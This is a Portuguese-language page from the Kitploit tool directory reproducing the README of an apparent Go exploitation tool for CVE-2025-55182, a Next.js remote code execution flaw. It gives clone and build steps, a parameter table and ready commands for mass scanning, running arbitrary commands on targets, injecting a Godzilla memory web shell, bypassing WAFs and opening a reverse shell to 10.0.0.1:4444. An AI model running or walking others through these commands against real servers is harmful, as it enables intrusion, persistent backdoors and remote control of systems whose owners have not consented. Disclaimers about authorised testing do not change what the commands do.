Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-POC — Ferramenta de varredura e exploração baseada em Go para CVE-2025-55182 (RCE no Next.js). Suporta varredura em lote, execução de comandos, injeção de shell de memória Godzilla, reverse shell e bypass de WAF. | Kitploit
Ferramentas/GitHubGitHub/luoqichen/cve-2025-55182-poc
Scanners de VulnerabilidadesExploraçãoShellcodeExploração de Aplicações WebBypass de WAFTestes de PenetraçãoComando e ControleDesenvolvimento de Payloads
GitHub
luoqichen/cve-2025-55182-poc

CVE-2025-55182-POC

Ferramenta de varredura e exploração baseada em Go para CVE-2025-55182 (RCE no Next.js). Suporta varredura em lote, execução de comandos, injeção de shell de memória Godzilla, reverse shell e bypass de WAF.

Ver Repositório
6há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 Next.js RCE Scanner

License

Ferramenta de varredura e exploração da CVE-2025-55182, voltada para a vulnerabilidade de execução remota de código em aplicações Next.js. Suporta detecção em lote, execução de comandos, injeção de memory shell do Godzilla e funcionalidade de reverse shell.

⚠️ Esta ferramenta destina-se apenas à pesquisa de segurança e a testes autorizados; não a utilize para fins ilegais.

Características

  • Varredura multi-alvo: suporta uma única URL, arquivos com listas de URLs (uma por linha) e pastas contendo vários arquivos .txt.
  • Concorrência multithread: permite personalizar o número de threads para aumentar a eficiência da varredura.
  • Validação da vulnerabilidade: verifica a existência da vulnerabilidade por meio do cálculo do produto de números aleatórios.
  • Execução de comandos: executa comandos arbitrários do sistema no alvo vulnerável (suporta Linux e Windows).
  • Injeção de memory shell Godzilla: gera com um clique as informações de conexão do memory shell Godzilla.
  • Reverse shell: suporta a funcionalidade de reverse shell.
  • Salvamento de resultados: salva automaticamente as URLs exploradas com sucesso e os detalhes em success.json, e opcionalmente exporta as URLs vulneráveis para um arquivo especificado.
  • Suporte a proxy: permite configurar um proxy HTTP, facilitando a integração com ferramentas como o Burp Suite.
  • Exibição de progresso: mostra em tempo real o progresso da varredura, o tempo decorrido, o tempo restante estimado, etc.
  • []

    Instalação

    Pré-requisitos

    • Go 1.16 ou superior
    • Git

    Clonar o repositório

    root@kitploit:~
    git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
    cd cve-2025-55182-POC
    

    Compilar

    root@kitploit:~
    go build -o cve-2025-55182 main.go
    

    Executar

    root@kitploit:~
    ./cve-2025-55182 -h
    

    Modo de uso

    Descrição dos parâmetros

    ParâmetroTipoValor padrãoDescrição
    -ustringnenhumURL de um único alvo (ex.: http://example.com:3000)
    -fstringnenhumArquivo contendo uma lista de URLs (uma por linha)
    -dstringnenhumPasta contendo vários arquivos .txt
    -ostringnenhumArquivo de saída (salva as URLs vulneráveis, uma por linha)
    -tint10Número de threads concorrentes
    -toint10Tempo limite (timeout) da solicitação (segundos)
    -cstringnenhumComando a ser executado (ex.: id)
    -mstringnenhumModo: waf (ativa o bypass de WAF)
    -pstringnenhumProxy HTTP (ex.: http://127.0.0.1:8080)
    -gboolfalseAtiva a injeção de memory shell Godzilla
    -rsstringnenhumEndereço do reverse shell (formato IP:PORT)
    -dvboolfalseModo detalhado (exibe o processo de varredura de cada URL)
    -esboolfalseModo de varredura de informações sensíveis

    Exemplos

    Escanear um único alvo

    root@kitploit:~
    ./cve-2025-55182 -u http://target.com:3000
    

    Escanear alvos em lote a partir de um arquivo

    root@kitploit:~
    ./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt
    

    Executar um comando

    root@kitploit:~
    ./cve-2025-55182 -u http://target.com:3000 -c "whoami"
    

    Usar o memory shell Godzilla

    root@kitploit:~
    ./cve-2025-55182 -u http://target.com:3000 -g
    

    Após a injeção bem-sucedida, a ferramenta exibirá o endereço de conexão, a senha, a chave e as informações do cabeçalho da requisição do Godzilla.

    Reverse shell

    root@kitploit:~
    ./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444
    

    Ativar proxy

    root@kitploit:~
    ./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10
    

    Descrição da saída

    • success.json: salva automaticamente as informações detalhadas de todos os alvos explorados com sucesso (incluindo saída de comandos, configuração do Godzilla, etc.).
    • Arquivo especificado por -o: salva a lista de URLs vulneráveis (uma por linha).

    Durante a varredura, uma barra de progresso e as vulnerabilidades encontradas são exibidas em tempo real; ao final, as estatísticas são exibidas.

    Observações

    1. Certifique-se de ter autorização: escanear ou atacar sistemas de terceiros sem autorização é uma atividade ilegal.
    2. Uso de proxy: se precisar visualizar o tráfego pelo Burp Suite, use o parâmetro -p para configurar o proxy.
    3. Conexão do Godzilla: após injetar o Godzilla com sucesso, use o cliente Godzilla para se conectar. Observe que a senha e a chave são geradas aleatoriamente.
    4. Configuração de timeout: para alvos com rede instável, aumente adequadamente o valor do parâmetro -to.

    Aviso legal

    Esta ferramenta é destinada exclusivamente à pesquisa de segurança e a testes autorizados. O usuário assume toda a responsabilidade legal pelos seus atos. Os desenvolvedores não se responsabilizam por qualquer uso indevido.

    Licença

    MIT

    Baixar ferramenta